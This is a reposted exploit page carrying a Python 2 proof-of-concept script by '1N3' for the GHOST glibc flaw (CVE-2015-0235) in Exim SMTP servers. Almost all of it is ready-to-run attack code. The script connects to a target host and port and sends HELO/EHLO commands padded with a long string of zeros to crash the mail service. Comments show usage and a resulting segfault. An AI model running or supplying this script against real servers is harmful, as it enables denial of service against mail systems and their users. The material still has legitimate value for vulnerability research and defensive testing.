Exim ESMTP GHOST Denial Of Service Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Exim ESMTP GHOST Denial Of Service Exploit

来源：http://crowdshield.com 作者：1N3 发布时间：2015-01-30

The below script is a PoC exploit for the GHOST vulnerability affecting Exim SMTP servers resulting in a service crash.

#!/usr/bin/python

# Exim ESMTP DoS Exploit by 1N3 v20150128

# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow

# http://crowdshield.com

#

# USAGE: python ghost-smtp-dos.py <ip> <port>

#

# Escape character is '^]'.

# 220 debian-7-7-64b ESMTP Exim 4.80 ...

# HELO

# 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

# Connection closed by foreign host.

#

# user () debian-7-7-64b:~$ dmesg

# ...

# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in

# libc-2.13.so[7fabef2a2000+182000]

import socket

import time

import sys, getopt

def main(argv):

argc = len(argv)

if argc <= 1:

print "usage: %s <host>" % (argv[0])

sys.exit(0)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = "

0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

"

target = argv[1] # SET TARGET

port = argv[2] # SET PORT

print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"

print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=s.connect((target,int(port)))

data = s.recv(1024)

print "CONNECTION: " +data

s.send('HELO ' + buffer + '\r\n')

data = s.recv(1024)

print "received: " +data

s.send('EHLO ' + buffer + '\r\n')

data = s.recv(1024)

print "received: " +data

s.close()

main(sys.argv)

[